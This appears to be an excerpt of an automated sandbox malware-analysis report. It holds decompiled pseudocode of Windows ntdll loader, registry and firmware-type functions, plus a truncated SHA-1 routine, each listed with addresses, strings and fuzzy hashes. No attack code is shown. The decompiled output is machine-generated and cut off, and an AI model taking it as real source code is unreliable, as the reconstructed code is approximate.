                                          			E033B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E033BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E033AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3495780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03425510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3495780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E033C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E033C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03427016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E033C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E033C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03427016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E033DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E033AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                          0x033b7e4c
                                          0x033b7e50
                                          0x033b7e55
                                          0x033b7e58
                                          0x033b7e5d
                                          0x033b7e71
                                          0x033b7f33
                                          0x033b7e77
                                          0x033b7e77
                                          0x033b7e79
                                          0x033b7e79
                                          0x033b7e7e
                                          0x033b7f45
                                          0x03409848
                                          0x00000000
                                          0x03409848
                                          0x033b7f4e
                                          0x033b7f53
                                          0x033b7f5a
                                          0x00000000
                                          0x00000000
                                          0x0340985a
                                          0x03409862
                                          0x03409866
                                          0x00000000
                                          0x0340986c
                                          0x00000000
                                          0x0340986c
                                          0x033b7e84
                                          0x033b7e84
                                          0x033b7e8d
                                          0x03409871
                                          0x033b7eb8
                                          0x033b7ec0
                                          0x033b7ec0
                                          0x033b7e9a
                                          0x0340987e
                                          0x00000000
                                          0x00000000
                                          0x03409884
                                          0x0340988b
                                          0x034098a7
                                          0x034098ac
                                          0x034098b1
                                          0x034098b6
                                          0x034098b8
                                          0x034098b8
                                          0x034098b9
                                          0x00000000
                                          0x034098b9
                                          0x033b7ea0
                                          0x033b7ea7
                                          0x00000000
                                          0x00000000
                                          0x033b7eac
                                          0x033b7eb1
                                          0x033b7ec6
                                          0x033b7ed0
                                          0x034098cc
                                          0x033b7ed6
                                          0x033b7ed6
                                          0x033b7ed6
                                          0x033b7ede
                                          0x033b7ee3
                                          0x034098e3
                                          0x034098f0
                                          0x03409902
                                          0x034098f2
                                          0x034098fb
                                          0x034098fb
                                          0x03409907
                                          0x0340991d
                                          0x0340991d
                                          0x03409907
                                          0x034098e3
                                          0x033b7ef0
                                          0x033b7f14
                                          0x033b7f14
                                          0x033b7f1e
                                          0x03409946
                                          0x033b7f24
                                          0x033b7f24
                                          0x033b7f24
                                          0x033b7f2c
                                          0x0340996a
                                          0x03409975
                                          0x03409975
                                          0x0340997e
                                          0x03409993
                                          0x03409993
                                          0x0340997e
                                          0x00000000
                                          0x033b7ef2
                                          0x033b7efc
                                          0x033b7f0a
                                          0x033b7f0e
                                          0x03409933
                                          0x00000000
                                          0x03409933
                                          0x00000000
                                          0x033b7f0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033b7eb1

                                          Strings
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 03409891
                                          • LdrpCompleteMapModule, xrefs: 03409898
                                          • minkernel\ntdll\ldrmap.c, xrefs: 034098A2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 4f94ab8cc8f609343788849cc1c5726c6e272fa818df3f2a1ec45b0b87b433b4
                                          • Instruction ID: 5eef51bace35361214c71e0232f35a52bcb1d8ffaf66f01a4391c6eb8b7a04da
                                          • Opcode Fuzzy Hash: 4f94ab8cc8f609343788849cc1c5726c6e272fa818df3f2a1ec45b0b87b433b4
                                          • Instruction Fuzzy Hash: AB51C231A047449FD721DB58C9C4BAAB7B8EF85310F1805AAEA51AFBE2D730ED00CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E033AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E033AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E033E95D0();
						}
						if(_t78 != 0) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E033EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E033EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E033E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E033EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L033AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E033EBB40(_t83, _t102 + 0x24, _t78);
								if(L033B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E033EBB40(_t84, _t102 + 0x24, _t94);
									if(L033B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                          0x033ae620
                                          0x033ae628
                                          0x033ae62f
                                          0x033ae631
                                          0x033ae635
                                          0x033ae637
                                          0x033ae63e
                                          0x03405503
                                          0x03405503
                                          0x033ae64c
                                          0x033ae64c
                                          0x033ae651
                                          0x00000000
                                          0x00000000
                                          0x033ae661
                                          0x033ae665
                                          0x0340542a
                                          0x033ae715
                                          0x033ae71a
                                          0x033ae71c
                                          0x033ae720
                                          0x033ae720
                                          0x033ae727
                                          0x033ae736
                                          0x033ae736
                                          0x033ae743
                                          0x033ae743
                                          0x033ae673
                                          0x033ae678
                                          0x033ae67d
                                          0x033ae682
                                          0x033ae685
                                          0x033ae692
                                          0x033ae69b
                                          0x033ae6a3
                                          0x033ae6ad
                                          0x033ae6b1
                                          0x033ae6b2
                                          0x033ae6bb
                                          0x033ae6bf
                                          0x033ae6c0
                                          0x033ae6c8
                                          0x033ae6cc
                                          0x033ae6d5
                                          0x033ae6d9
                                          0x00000000
                                          0x00000000
                                          0x033ae6e5
                                          0x033ae6ea
                                          0x033ae6f9
                                          0x033ae70b
                                          0x033ae70f
                                          0x03405439
                                          0x0340545e
                                          0x0340545e
                                          0x00000000
                                          0x0340545e
                                          0x0340543b
                                          0x0340543e
                                          0x03405440
                                          0x03405445
                                          0x03405472
                                          0x03405475
                                          0x0340548d
                                          0x03405493
                                          0x034054a9
                                          0x00000000
                                          0x00000000
                                          0x034054ab
                                          0x034054b4
                                          0x034054bc
                                          0x034054c8
                                          0x034054de
                                          0x034054fb
                                          0x034054e0
                                          0x034054e6
                                          0x034054eb
                                          0x034054eb
                                          0x034054de
                                          0x00000000
                                          0x034054bc
                                          0x03405477
                                          0x0340547a
                                          0x03405480
                                          0x03405483
                                          0x03405486
                                          0x0340548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0340548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03405447
                                          0x03405447
                                          0x03405447
                                          0x03405447
                                          0x0340544e
                                          0x00000000
                                          0x00000000
                                          0x03405450
                                          0x03405452
                                          0x03405455
                                          0x0340545a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0340545c
                                          0x0340546a
                                          0x0340546d
                                          0x0340546f
                                          0x00000000
                                          0x0340546f
                                          0x033ae70f

                                          Strings
                                          • InstallLanguageFallback, xrefs: 033AE6DB
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 033AE68C
                                          • @, xrefs: 033AE6C0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 4549b1bdc027354a5623fa7a2c002d6d5d22402d67e94edf5a4f6af165f1e616
                                          • Instruction ID: 3368249ff3293fce41cf0a188700082450cec32ab708501c0c3f7e8098c0ca89
                                          • Opcode Fuzzy Hash: 4549b1bdc027354a5623fa7a2c002d6d5d22402d67e94edf5a4f6af165f1e616
                                          • Instruction Fuzzy Hash: BF51C375A083169BC710DF65C480BABB3E8EF89615F09096EF985DB290F734D904CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034251BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E034251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x34805f0);
				E033FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E033BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E034253CA(0);
						return E033FD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E033EF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E033C3690(1, _t117, 0x3381810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E033EAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L033C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E033EAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0342500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E033E9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                          0x034251be
                                          0x034251c3
                                          0x034251c8
                                          0x034251cd
                                          0x034251d0
                                          0x034251d3
                                          0x034251d8
                                          0x034251db
                                          0x034251de
                                          0x034251e0
                                          0x034251e3
                                          0x034251e6
                                          0x034251e8
                                          0x03425342
                                          0x03425351
                                          0x03425356
                                          0x0342535a
                                          0x03425360
                                          0x03425363
                                          0x03425366
                                          0x03425369
                                          0x03425369
                                          0x0342536b
                                          0x0342536b
                                          0x03425370
                                          0x034253a3
                                          0x034253a4
                                          0x034253a6
                                          0x034253ab
                                          0x034253ab
                                          0x034253ae
                                          0x034253ae
                                          0x034253b5
                                          0x034253bf
                                          0x034253bf
                                          0x03425375
                                          0x03425396
                                          0x034253a0
                                          0x034253a0
                                          0x00000000
                                          0x03425396
                                          0x03425377
                                          0x03425379
                                          0x0342537f
                                          0x0342538c
                                          0x03425390
                                          0x00000000
                                          0x03425390
                                          0x034251ee
                                          0x034251f1
                                          0x03425301
                                          0x03425310
                                          0x03425315
                                          0x03425318
                                          0x0342531b
                                          0x03425320
                                          0x0342532e
                                          0x03425331
                                          0x00000000
                                          0x03425331
                                          0x03425328
                                          0x03425329
                                          0x00000000
                                          0x03425329
                                          0x034251fa
                                          0x03425235
                                          0x03425236
                                          0x03425239
                                          0x0342523f
                                          0x03425240
                                          0x03425241
                                          0x03425242
                                          0x03425246
                                          0x03425247
                                          0x0342524e
                                          0x03425251
                                          0x03425267
                                          0x03425269
                                          0x0342526e
                                          0x0342527d
                                          0x0342527e
                                          0x03425281
                                          0x03425282
                                          0x03425287
                                          0x03425288
                                          0x0342528a
                                          0x0342528f
                                          0x03425294
                                          0x00000000
                                          0x00000000
                                          0x0342529a
                                          0x0342529c
                                          0x0342529e
                                          0x0342529e
                                          0x034252a4
                                          0x034252b0
                                          0x00000000
                                          0x00000000
                                          0x034252ba
                                          0x034252bc
                                          0x034252bc
                                          0x034252d4
                                          0x034252d9
                                          0x034252dc
                                          0x034252e1
                                          0x00000000
                                          0x00000000
                                          0x034252e7
                                          0x034252f4
                                          0x00000000
                                          0x034252f4
                                          0x03425270
                                          0x00000000
                                          0x03425270
                                          0x034251fc
                                          0x034251fd
                                          0x03425202
                                          0x03425203
                                          0x03425205
                                          0x0342520a
                                          0x0342520f
                                          0x00000000
                                          0x00000000
                                          0x0342521b
                                          0x03425226
                                          0x0342522b
                                          0x0342521d
                                          0x0342521d
                                          0x03425222
                                          0x03425222
                                          0x0342522d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 0043c7aa656dee45b7569c6e4c560227046a39bdcd9967bb94a563cd53010cc0
                                          • Instruction ID: 79a4849bf8f6eacf5f0e2d5c45d761a3d8065c05dc24b93c5bd649d6b69426f0
                                          • Opcode Fuzzy Hash: 0043c7aa656dee45b7569c6e4c560227046a39bdcd9967bb94a563cd53010cc0
                                          • Instruction Fuzzy Hash: 4F516EB1E007289FDB24DFA88980AAEFBF8FB45700F54406EE559EF291D6719901CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409E30, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00409E30(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
